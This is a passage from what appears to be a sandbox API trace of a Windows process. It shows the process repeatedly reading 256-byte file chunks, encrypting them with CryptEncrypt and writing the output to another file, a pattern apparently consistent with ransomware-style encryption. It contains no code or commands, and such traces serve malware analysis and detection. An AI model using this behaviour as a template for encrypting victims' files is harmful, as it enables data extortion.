lpOverlapped=0x0) returned 1 [0167.767] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.767] GetLastError () returned 0x0 [0167.767] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.767] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.767] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.767] GetLastError () returned 0x0 [0167.767] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.767] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.767] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.768] GetLastError () returned 0x0 [0167.768] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.768] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.768] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.768] GetLastError () returned 0x0 [0167.768] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.768] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.768] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.768] GetLastError () returned 0x0 [0167.768] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.768] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.768] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.768] GetLastError () returned 0x0 [0167.768] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.768] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.768] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.768] GetLastError () returned 0x0 [0167.768] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.768] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.768] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.768] GetLastError () returned 0x0 [0167.768] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.768] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.768] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.768] GetLastError () returned 0x0 [0167.768] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.769] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.769] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.769] GetLastError () returned 0x0 [0167.769] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.769] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.769] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.769] GetLastError () returned 0x0 [0167.769] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.769] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.769] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.769] GetLastError () returned 0x0 [0167.769] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.769] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.769] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.769] GetLastError () returned 0x0 [0167.769] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.769] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.769] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.769] GetLastError () returned 0x0 [0167.769] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.769] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.769] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.769] GetLastError () returned 0x0 [0167.769] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.769] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.770] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.770] GetLastError () returned 0x0 [0167.770] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.770] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.770] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.770] GetLastError () returned 0x0 [0167.770] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.770] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.770] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.770] GetLastError () returned 0x0 [0167.770] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.770] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.770] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.770] GetLastError () returned 0x0 [0167.770] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.770] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.770] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.770] GetLastError () returned 0x0 [0167.770] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.770] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.770] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.770] GetLastError () returned 0x0 [0167.770] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.770] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.770] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.770] GetLastError () returned 0x0 [0167.770] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.771] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.771] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.771] GetLastError () returned 0x0 [0167.771] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.771] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.771] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.771] GetLastError () returned 0x0 [0167.771] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.771] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.771] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.771] GetLastError () returned 0x0 [0167.771] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.771] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.771] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.771] GetLastError () returned 0x0 [0167.771] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.771] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.771] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.771] GetLastError () returned 0x0 [0167.771] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.771] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.771] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.771] GetLastError () returned 0x0 [0167.771] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.771] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.772] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.772] GetLastError () returned 0x0 [0167.772] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.772] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.772] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.772] GetLastError () returned 0x0 [0167.772] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.772] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.772] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.772] GetLastError () returned 0x0 [0167.772] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.772] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.772] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.772] GetLastError () returned 0x0 [0167.772] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.772] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.772] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, 